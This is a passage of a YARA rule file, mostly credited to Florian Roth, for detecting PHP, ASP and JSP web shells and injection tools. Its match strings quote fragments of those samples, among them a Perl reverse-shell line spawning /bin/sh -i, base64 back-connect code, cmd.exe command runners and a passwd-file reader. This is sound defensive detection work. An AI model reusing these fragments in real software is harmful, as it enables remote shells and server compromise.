        author = "Florian Roth"
        reference = "not set"
        date = "2015/01/24"
        hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
    strings:
        // looks like a Serv-U admin-protocol SETUSERSETUP block
        $x1  = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
        // SQL executor / connection string UI
        $x2  = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
        $x3  = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
        // process / service enumeration
        $x4  = "Process[] p=Process.GetProcesses();" fullword ascii
        $x5  = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
        $x6  = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
        // auth cookie, drive type P/Invoke, file download header
        $x7  = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
        $x8  = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
        $x9  = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
        // obfuscated-name event wiring and registry browser
        $x10 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
        $x11 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
        $x12 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
        // credits / redirect to the author's site
        $x13 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
        $x14 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
    condition:
        6 of ($x*)
}
rule xssshell_db {
    // XSS Shell db.asp: matches solely on the author credit comment. That
    // comment is likely shared by the other files of the same package (and
    // possibly other ASP code by the same author), so treat hits as
    // "XSS Shell family" rather than db.asp specifically.
    meta:
        description = "Webshells Auto-generated - file db.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "cb62e2ec40addd4b9930a9e270f5b318"
    strings:
        $credit = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
    condition:
        $credit
}
rule webshell_jsp_web {
    // One-liner JSP shell (web.jsp): the page imports java.io/java.net and
    // immediately reads a request parameter on the same line.
    meta:
        description = "Web Shell - file web.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
    strings:
        $oneliner = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
    condition:
        $oneliner
}
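rule csh_php_php {
    // c0derz web shell (csh.php). The generated condition was "1 of them",
    // so the bare project URL or contact e-mail address fired on its own —
    // both also appear in anything that merely mentions the site. The banner
    // and the hard-coded password hash line stay sufficient alone; the URL
    // and the address now have to occur together.
    meta:
        description = "Semi-Auto-generated  - file csh.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "194a9d3f3eac8bc56d9a7c55c016af96"
    strings:
        $banner = ".::[c0derz]::. web-shell"
        // site/contact strings: weak on their own, only counted as a pair
        $site   = "http://c0derz.org.ua"
        $mail   = "vint21h@c0derz.org.ua"
        // hard-coded auth hash; the trailing //root comment suggests md5("root")
        $auth   = "$name='63a9f0ea7bb98050796b649e85481845';//root"
    condition:
        any of ($banner, $auth) or ($site and $mail)
}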
rule Webshell_27_9_acid_c99_locus7s {
    // Back-connect component shared by 27.9.txt, acid.php and c99_locus7s:
    // the ex() call that launches /tmp/back with the POSTed IP/port, or the
    // error message for a failed back-connect. Either one suffices, bounded
    // by a file-size cap.
    meta:
        description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
        hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
        hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
        hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
        hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
        hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
        hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
        hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
    strings:
        // launches the dropped back-connect binary with attacker-supplied IP and port
        $bc_launch = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
        // failure message of the same feature
        $bc_error  = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
    condition:
        filesize < 1711KB and any of ($bc_launch, $bc_error)
}
rule DllInjection {
    // DllInjection.exe: single path fragment (\BDoor\DllInjecti...), most
    // likely a build/PDB path left in the binary — confirm against the
    // sample before relying on it.
    meta:
        description = "Webshells Auto-generated - file DllInjection.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "a7b92283a5102886ab8aee2bc5c8d718"
    strings:
        $build_path = "\\BDoor\\DllInjecti"
    condition:
        $build_path
}
rule webshell_in_JFolder_jfolder01_jsp_leo_warn {
    // JFolder-family JSP file managers: the two file-listing links
    // (download / edit) that these variants build with sbFile.append().
    // Both fragments are required.
    meta:
        description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
        hash1 = "8979594423b68489024447474d113894"
        hash2 = "ec482fc969d182e5440521c913bab9bd"
        hash3 = "f98d2b33cd777e160d1489afed96de39"
        hash4 = "4b4c12b3002fad88ca6346a873855209"
        hash5 = "e9a5280f77537e23da2545306f6a19ad"
    strings:
        $link_down = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
        $link_edit = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
    condition:
        $link_down and $link_edit
}
rule screencap {
    // screencap.exe screenshot tool. The three indicators are ordinary GDI
    // imports plus an output file name, so benign screen-capture utilities
    // may well match too — corroborate hits before acting on them.
    meta:
        description = "Webshells Auto-generated - file screencap.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "51139091dea7a9418a50f2712ea72aa6"
    strings:
        $api_dib  = "GetDIBColorTable"
        $api_dc   = "CreateDCA"
        $out_file = "Screen.bmp"
    condition:
        $api_dib and $api_dc and $out_file
}
rule Simple_PHP_BackDooR {
    // Simple_PHP_BackDooR.php: usage hint, the upload handler
    // (move_uploaded_file into $dir) or the self-describing comment.
    // Any one of them fires.
    meta:
        description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "a401132363eecc3a1040774bec9cb24f"
    strings:
        $usage   = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
        $upload  = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
        $comment = "// a simple php backdoor"
    condition:
        any of them
}
rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {
    // c99/c100 family: the "Running datapipe..." status line printed after
    // the port-forward (datapipe) feature starts. Single string.
    meta:
        description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
        hash1 = "f2fa878de03732fbf5c86d656467ff50"
        hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
        hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
        hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
        hash5 = "048ccc01b873b40d57ce25a4c56ea717"
    strings:
        $datapipe_ok = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
    condition:
        $datapipe_ok
}
rule webshell_phpshell_2_1_config {
    // PHPShell 2.1 config.php: the comment line from its [users] section
    // explaining the 'username = "password"' format. Single string.
    meta:
        description = "Web Shell - file config.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "bd83144a649c5cc21ac41b505a36a8f3"
    strings:
        $users_hint = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
    condition:
        $users_hint
}
rule Reader_asp {
    // Reader.asp: author credit, domain fragment and the start of an
    // encoded script block followed by the "inf" form. The ^#~@ terminator
    // in $encoded looks like a Windows Script Encoder wrapper — unverified.
    // Two of the three are required.
    meta:
        description = "Semi-Auto-generated  - file Reader.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "ad1a362e0a24c4475335e3e891a01731"
    strings:
        $credit  = "Mehdi & HolyDemon"
        $domain  = "www.infilak."
        $encoded = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
    condition:
        2 of ($credit, $domain, $encoded)
}
rule Mithril_v1_45_dllTest {
    // Mithril v1.45 dllTest.dll: "syspath" token, the \Mithril path
    // fragment and a help line of its service-listing command.
    // All three required; "syspath" alone would be far too generic.
    meta:
        description = "Webshells Auto-generated - file dllTest.dll"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "1b9e518aaa62b15079ff6edb412b21e9"
    strings:
        $tok_syspath = "syspath"
        $path_frag   = "\\Mithril"
        $help_svc    = "--list the services in the computer"
    condition:
        $tok_syspath and $path_frag and $help_svc
}
rule Mithril_Mithril {
    // Mithril.exe: error strings of the classic remote-thread injection
    // sequence (OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
    // CreateRemoteThread, GetProcAddress on Kernel32) plus two sample-
    // specific artefacts ("Cmaudi0", an opcode-looking fragment).
    // Every string is required.
    meta:
        description = "Webshells Auto-generated - file Mithril.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "017191562d72ab0ca551eb89256650bd"
    strings:
        // injection error messages
        $err_open   = "OpenProcess error!"
        $err_alloc  = "VirtualAllocEx error!"
        $err_write  = "WriteProcessMemory error!"
        $err_thread = "CreateRemoteThread error!"
        $err_gpa    = "GetProcAddress error!"
        $mod_k32    = "Kernel32"
        // sample-specific artefacts
        $art_cmaudi = "Cmaudi0"
        $art_bytes  = "HHt`HHt\\"
    condition:
        all of them
}
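rule r57shell_php_php {
    // r57shell PHP web shell. The generated condition was "1 of them" with
    // the bare tool name "r57shell" (fullword) as one of the triggers; that
    // token also occurs in AV logs, write-ups, directory listings and in
    // rule sets like this one (fullword does not exclude '_' or '.'), so on
    // its own it is a false-positive generator. The name now only counts
    // together with a PHP open tag; the three code/banner strings remain
    // sufficient alone. Files using only the short "<?" tag will need the
    // code/banner strings to match.
    meta:
        description = "Semi-Auto-generated  - file r57shell.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "d28445de424594a5f14d0fe2a7c4e94f"
    strings:
        $name    = "r57shell" fullword
        $php_tag = "<?php" ascii
        // command dispatch for the "lynx" option
        $lynx    = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
        $team    = "RusH security team"
        // localisation table entry of the back-connect feature
        $bc_text = "'ru_text12' => 'back-connect"
    condition:
        any of ($lynx, $team, $bc_text) or ($name and $php_tag)
}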
rule c99shell {
    // c99shell.php: HTML-escaped upload form fragment ("Input URL" with the
    // uploadurl field). Single string.
    meta:
        description = "Webshells Auto-generated - file c99shell.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "90b86a9c63e2cd346fe07cea23fbfc56"
    strings:
        $upload_form = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
    condition:
        $upload_form
}
rule xssshell_default {
    // XSS Shell default.asp: the line that re-formats proxied data with
    // DATA_SEPERATOR (sic) for display. Single string.
    meta:
        description = "Webshells Auto-generated - file default.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "d156782ae5e0b3724de3227b42fcaf2f"
    strings:
        $proxy_fmt = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
    condition:
        $proxy_fmt
}
rule r57shell {
    // r57shell.php: the back-connect status message injected into the
    // command field. Single string.
    meta:
        description = "Webshells Auto-generated - file r57shell.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "8023394542cddf8aee5dec6072ed02b5"
    strings:
        $bc_msg = " $_POST['cmd']=\"echo \\\"Now script try connect to"
    condition:
        $bc_msg
}
rule HYTop_DevPack_2005Red {
    // HYTop DevPack 2005Red.asp: theme colour, the directory-listing link
    // builder and the web-root-relative path computation. All required.
    meta:
        description = "Webshells Auto-generated - file 2005Red.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
    strings:
        $css_theme  = "scrollbar-darkshadow-color:#FF9DBB;"
        $list_link  = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
        $rel_path   = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
    condition:
        $css_theme and $list_link and $rel_path
}
rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {
    // JspSpy-derived shells: number formatting helper and the upload
    // target checks. Two of three required. The fragments are plain Java
    // upload/formatting code, so ordinary JSP upload handlers could also
    // hit — corroborate before acting.
    meta:
        description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
        hash1 = "059058a27a7b0059e2c2f007ad4675ef"
        hash2 = "8b457934da3821ba58b06a113e0d53d9"
        hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
        hash4 = "e0354099bee243702eb11df8d0e046df"
        hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
        hash6 = "655722eaa6c646437c8ae93daac46ae0"
        hash7 = "591ca89a25f06cf01e4345f98a22845c"
    strings:
        $fmt_double = "return new Double(format.format(value)).doubleValue();" fullword
        $save_file  = "File tempF = new File(savePath);" fullword
        $save_isdir = "if (tempF.isDirectory()) {" fullword
    condition:
        2 of ($fmt_double, $save_file, $save_isdir)
}
rule webshell_shell_phpspy_2006_arabicspy {
    // phpspy 2006 lineage: registry-write branch and the shell form that
    // posts back to ?action=shell. Both required.
    meta:
        description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "791708057d8b429d91357d38edf43cc0"
        hash1 = "40a1f840111996ff7200d18968e42cfe"
        hash2 = "e0202adff532b28ef1ba206cf95962f2"
    strings:
        $reg_write  = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
        $shell_form = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
    condition:
        $reg_write and $shell_form
}
rule nstview_nstview {
    // nstview.php: embedded Perl back-connect one-liner (STDIN/STDOUT/STDERR
    // dup'ed onto the socket X, then exec /bin/sh -i) as it appears inside
    // the PHP source, i.e. with its quotes backslash-escaped. Single string.
    meta:
        description = "Webshells Auto-generated - file nstview.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "3871888a0c1ac4270104918231029a56"
    strings:
        $perl_bc = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
    condition:
        $perl_bc
}
rule webshell_jsp_inback3 {
    // inback3.jsp: one-line file writer that opens a FileOutputStream as
    // soon as the "f" parameter is present. Single string.
    meta:
        description = "Web Shell - file inback3.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "ea5612492780a26b8aa7e5cedd9b8f4e"
    strings:
        $writer = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
    condition:
        $writer
}
rule webshell_jsp_k81 {
    // k81.jsp: base64-decodes the cmd parameter, and answers the magic
    // value "Szh0ZWFt" (base64 of "K8team") with the current directory
    // wrapped in [S]...[E]. Either string suffices.
    meta:
        description = "Web Shell - file k81.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "41efc5c71b6885add9c1d516371bd6af"
    strings:
        $decode = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
        $magic  = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
    condition:
        any of them
}
rule WebShell_Generic_PHP_11 {
    // rootshell / s72 Shell lineage: the "copy_of_" backup feature, the
    // directory walk and one table-cell of the layout. All eight fragments
    // are required, so any variant that changes its HTML will be missed.
    meta:
        description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
        hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
        hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
        hash3 = "80aba3348434c66ac471daab949871ab16c50042"
    strings:
        // backup-copy feature
        $bk_prefix  = "$backupstring = \"copy_of_\";" fullword
        $bk_name    = "$filename = $backupstring.\"$filename\";" fullword
        $bk_globals = "global $file_name, $filename;" fullword
        $bk_exists  = "if( file_exists($file_name))" fullword
        $bk_copy    = "copy($file,\"$filename\");" fullword
        // directory walk
        $dir_loop   = "while ($file = readdir($folder)) {" fullword
        $dir_skip   = "if($file != \".\" && $file != \"..\")" fullword
        // layout
        $html_cell  = "<td width=\"49%\" height=\"142\">" fullword
    condition:
        all of ($bk*) and all of ($dir*) and $html_cell
}
rule WebShell_GFS {
    // GFS web-shell 3.1.7 / Predator: base64-encoded back-connect sources
    // embedded in the PHP. Decoded, the fragments read roughly
    //   ");\r\nclose(STDOUT);\r\nclose(STDERR);"
    //   " CONN;\r\nexit 0;\r\n}\r\n}"
    //   ";\r\n dup2(fd, 2);\r\n execl(\"/bin/sh\",\"sh -i\", NULL);\r\n close(f"
    // (alignment of the first two fragments is offset by one character).
    // All three required.
    meta:
        description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
        hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
        hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
    strings:
        $b64_close_std = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
        $b64_exit      = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
        $b64_execl_sh  = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
    condition:
        $b64_close_std and $b64_exit and $b64_execl_sh
}
rule webshell_ghost_source_icesword_silic {
    // IceSword / silic PHP shells: SQL-query keyword check on nsql and the
    // upload handler using the ufp/ufn fields. Both required.
    meta:
        description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
        hash1 = "6e20b41c040efb453d57780025a292ae"
        hash2 = "437d30c94f8eef92dc2f064de4998695"
    strings:
        $sql_check = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
        $upload    = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
    condition:
        $sql_check and $upload
}
rule webshell_config_myxx_zend {
    // config.jsp / myxx.jsp / zend.jsp: the "Can Not Pack" alert link of the
    // pack (archive) feature. Single string.
    meta:
        description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
        hash1 = "e0354099bee243702eb11df8d0e046df"
        hash2 = "591ca89a25f06cf01e4345f98a22845c"
    strings:
        $pack_alert = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
    condition:
        $pack_alert
}
rule php_anuna {
    // "anuna" PHP trojan pattern: file opens with "<?php $x = '", a string is
    // split with explode(chr((N±M))), another variable is assigned an
    // (N±M) arithmetic value, and a function_exists() guard is present.
    // All four regexes are required.
    meta:
        author      = "Vlad https://github.com/vlad-s"
        date        = "2016/07/18"
        description = "Catches a PHP Trojan"
    strings:
        $open_assign = /<\?php \$[a-z]+ = '/
        $explode_chr = /\$[a-z]+=explode\(chr\(\([0-9]+[-+][0-9]+\)\)/
        $arith_value = /\$[a-z]+=\([0-9]+[-+][0-9]+\)/
        $fn_guard    = /if \(!function_exists\('[a-z]+'\)\)/
    condition:
        $open_assign and $explode_chr and $arith_value and $fn_guard
}
rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {
    // JspSpy family super rule: the default port list of its port scanner
    // and the VEditPropertyInvoker inner class. Both required.
    meta:
        description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
        hash1 = "059058a27a7b0059e2c2f007ad4675ef"
        hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
        hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
        hash4 = "8b457934da3821ba58b06a113e0d53d9"
        hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
        hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
        hash7 = "14e9688c86b454ed48171a9d4f48ace8"
        hash8 = "b330a6c2d49124ef0729539761d6ef0b"
        hash9 = "d71716df5042880ef84427acee8b121e"
        hash10 = "341298482cf90febebb8616426080d1d"
        hash11 = "29aebe333d6332f0ebc2258def94d57e"
        hash12 = "42654af68e5d4ea217e6ece5389eb302"
        hash13 = "88fc87e7c58249a398efd5ceae636073"
        hash14 = "4a812678308475c64132a9b56254edbc"
        hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
        hash16 = "e0354099bee243702eb11df8d0e046df"
        hash17 = "344f9073576a066142b2023629539ebd"
        hash18 = "32dea47d9c13f9000c4c807561341bee"
        hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
        hash20 = "655722eaa6c646437c8ae93daac46ae0"
        hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
        hash22 = "9c94637f76e68487fa33f7b0030dd932"
        hash23 = "6acc82544be056580c3a1caaa4999956"
        hash24 = "6aa32a6392840e161a018f3907a86968"
        hash25 = "591ca89a25f06cf01e4345f98a22845c"
        hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
        hash27 = "3ea688e3439a1f56b16694667938316d"
        hash28 = "ab77e4d1006259d7cbc15884416ca88c"
        hash29 = "71097537a91fac6b01f46f66ee2d7749"
        hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
        hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
    strings:
        // default target ports of the built-in port scanner
        $scan_ports = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
        // inner class of the property editor
        $invoker    = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
    condition:
        $scan_ports and $invoker
}
rule webshell_cmd_asp_5_1 {
    // cmd-asp-5.1.asp: runs the submitted command through
    // "win.com cmd.exe /c ..." and redirects output to a temp file. Single string.
    meta:
        description = "Web Shell - file cmd-asp-5.1.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "8baa99666bf3734cbdfdd10088e0cd9f"
    strings:
        $run_cmd = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
    condition:
        $run_cmd
}
rule Ajan_asp {
    // Ajan.asp downloader: target zip path, the line writing c:\net.vbs, and
    // the hosting URL. Any one fires — note that "c:\downloaded.zip" on its
    // own is a fairly generic path and may hit unrelated scripts.
    meta:
        description = "Semi-Auto-generated  - file Ajan.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "b6f468252407efc2318639da22b08af0"
    strings:
        $zip_path  = "c:\\downloaded.zip"
        $write_vbs = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
        $host_url  = "http://www35.websamba.com/cybervurgun/"
    condition:
        any of them
}
rule WebShell_Web_shell__c_ShAnKaR {
    // ShAnKaR web shell: file download header, SQL dump textarea, dump
    // header writer and the passwd-file echo loop. Two of four required.
    meta:
        description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
        author = "Florian Roth"
        hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
    strings:
        $dl_header   = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
        $dump_area   = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
        $dump_hdr    = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
        $passwd_echo = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
    condition:
        2 of ($dl_header, $dump_area, $dump_hdr, $passwd_echo)
}
rule webshell_phpspy2010 {
    // phpspy2010.php: packed-code loader, the "//angel" author tag and the
    // cookie-domain config line. All three required (the loader alone is a
    // generic obfuscation idiom).
    meta:
        description = "Web Shell - file phpspy2010.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "14ae0e4f5349924a5047fed9f3b105c5"
    strings:
        $loader     = "eval(gzinflate(base64_decode("
        $author_tag = "//angel" fullword
        $cfg_cookie = "$admin['cookiedomain'] = '';" fullword
    condition:
        $loader and $author_tag and $cfg_cookie
}
rule aZRaiLPhp_v1_0_php {
    // aZRaiLPhp 1.0 (Turkish-language PHP shell): name token plus two of its
    // form buttons ("Dosya Yolla!" = send file, "TAMAM" = OK). Two of three.
    meta:
        description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "26b2d3943395682e36da06ed493a3715"
    strings:
        $name      = "azrailphp"
        $btn_send  = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
        $btn_ok    = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
    condition:
        2 of ($name, $btn_send, $btn_ok)
}
rule FSO_s_phvayv_2 {
    // phvayv.php: its fixed-size editor textarea with "XXXX" placeholder.
    // Single string.
    meta:
        description = "Webshells Auto-generated - file phvayv.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "205ecda66c443083403efb1e5c7f7878"
    strings:
        $editor_area = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
    condition:
        $editor_area
}
rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {
    // phpshell-derived shells (Dive Shell, SimShell): command-history
    // lookup and the bare "cd" handling regex. Both required.
    meta:
        description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
        hash1 = "f8a6d5306fb37414c5c772315a27832f"
        hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
    strings:
        $hist_lookup = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
        $cd_regex    = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
    condition:
        $hist_lookup and $cd_regex
}
rule webshell_webshell_cnseay02_1 {
    // cnseay02 obfuscated shell: $_uU is used as a chr()-style builder; the
    // visible codes 99,114,101,97,116 spell "creat" (presumably the start of
    // "create_function"). Single string.
    meta:
        description = "Web Shell - file webshell-cnseay02-1.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "95fc76081a42c4f26912826cb1bd24b1"
    strings:
